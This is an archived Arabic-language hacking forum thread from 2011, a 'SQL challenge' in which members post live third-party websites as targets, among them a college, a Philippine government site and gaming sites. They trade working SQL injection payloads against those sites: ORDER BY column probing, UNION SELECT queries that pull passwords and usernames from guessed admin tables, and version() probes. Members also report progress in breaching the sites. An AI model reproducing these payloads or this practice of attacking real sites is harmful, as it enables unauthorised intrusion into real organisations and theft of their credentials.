:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   SQL قواعد البيانات (http://www.vbspiders.com/vb/f133.html)
-   -   {SQL}تحدي SQL (http://www.vbspiders.com/vb/t58842.html)

aircrack -ng 10-05-2011 10:04 PM

رد: {SQL}تحدي SQL
 
اقتباس:

المشاركة الأصلية كتبت بواسطة CODE3 (المشاركة 401951)
الفائز في التحدي الاول هو:المفترس:clap::6:

التحدي الثاني

مستوى التحدي أصعب من الاول

كود PHP:

http://www.galilcol.ac.il/page.asp?id=17 


هههههههههههههههههههه يلزم كيلو ونص تخمين عشان تضهر الاعمده المصابه وبعدها كيلو تخمين عشان تجيب الباس واليوزر

aircrack -ng 10-05-2011 10:11 PM

رد: {SQL}تحدي SQL
 
نعطي لمحه على هالنوع من الحقن
هون نستعمل الامر order by عادي
طيب طلع معانا 15 عمود
كود:

http://www.galilcol.ac.il/page.asp?id=17 order by 15
المرحله التانيه لازم نستعمل التخمين عشان تظهر الاعمده المصابه مثلا انا خمنت شوي ومانفع المهم نخمن مثلا هيك
كود:

http://www.galilcol.ac.il/page.asp?id=17 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15+from+administratour
نفرض انو طلع معانا العمود المصاب 5 مكان العمود المصاب نجرب نخمن مثلا password وكمان username

مثلا

كود:

http://www.galilcol.ac.il/page.asp?id=17 UNION SELECT 1,2,3,4,password,6,7,8,9,10,11,12,13,14,15+from+administratour
هذا مجرد مثال

مذكرة الموت 10-05-2011 10:20 PM

رد: {SQL}تحدي SQL
 
هههههههههههه حلوه قصه الكيلو يا نسيم

CODE3 10-06-2011 02:52 PM

رد: {SQL}تحدي SQL
 
اقتباس:

المشاركة الأصلية كتبت بواسطة مذكرة الموت (المشاركة 402003)
هات غيره هاذا asb سيرفر وندوز غثيث مره جيب موقع ثاني ويا حبذا يكون مستوى hard


الهدف
كود PHP:

www.dbm.gov.ph/ro/index.php?code=ROVI&pid=288 

المستوى:
hard
http://img812.imageshack.us/img812/7...vphpbypass.png
:12::12::12::12:

تحياتي للجميع

EvilGue 10-06-2011 03:23 PM

رد: {SQL}تحدي SQL
 
و الله انا مبتدي بس هذا اللي قدرت اوصل له
الموقع هذا يحقن بالـ error based

لضيق الوقت و الدراسة ما قدرت اعمل شي

تحياتي للجميع =)

المفترس 10-06-2011 07:51 PM

رد: {SQL}تحدي SQL
 
صح المستوى hard

ولكن لا يهمك المفترس يفترس كل شيء

تم معرفة العواميد مصابة وجاري التكملة

المفترس 10-06-2011 08:50 PM

رد: {SQL}تحدي SQL
 
انا متوقف عند forbiden
وما استطعت تخطيها لكن ساحاول ولو تطلب اشهر

akeles 10-06-2011 09:48 PM

رد: {SQL}تحدي SQL
 
مشكورررر أخي

EvilGue 10-07-2011 01:44 AM

رد: {SQL}تحدي SQL
 
تم الحل
اعني الموقع الاول ارسلته على الخاص

EvilGue 10-07-2011 01:53 AM

رد: {SQL}تحدي SQL
 
ههه باقيلي 35 مشاركة على ما اقدر ارسله لك اشوفك بعدين هذي صورة
http://oi55.tinypic.com/kedzcm.jpg

EvilGue 10-07-2011 02:00 AM

رد: {SQL}تحدي SQL
 
اقتباس:

المشاركة الأصلية كتبت بواسطة المفترس (المشاركة 401833)
http://www.segundoidioma.com/page.php?Id=0

موقع سهل لتدريب فيه فقط شيء بسيط تخطوه

http://www.segundoidioma.com/page.ph...rom%20usuarios

أبو محسن 10-08-2011 09:56 PM

رد: {SQL}تحدي SQL
 
حقنه المستوى hard

www.yoquierogames.com/games.php?id=98

اصدار الرابع

سلاش 10-10-2011 07:05 PM

رد: {SQL}تحدي SQL
 
تم معرفة العواميد المصابه


...............


القاعده اصدارها Play 4.1.22-standard



يعني مالك الا انك تخمن

EvilGue 10-11-2011 10:07 AM

رد: {SQL}تحدي SQL
 
هههه كيلو و نص تخمين و ولا شي

http://www.yoquierogames.com/games.php?id=-98 UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13--

memomohannad 10-11-2011 01:26 PM

رد: {SQL}تحدي SQL
 
مشكور اخي الكريم


الساعة الآن 11:18 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0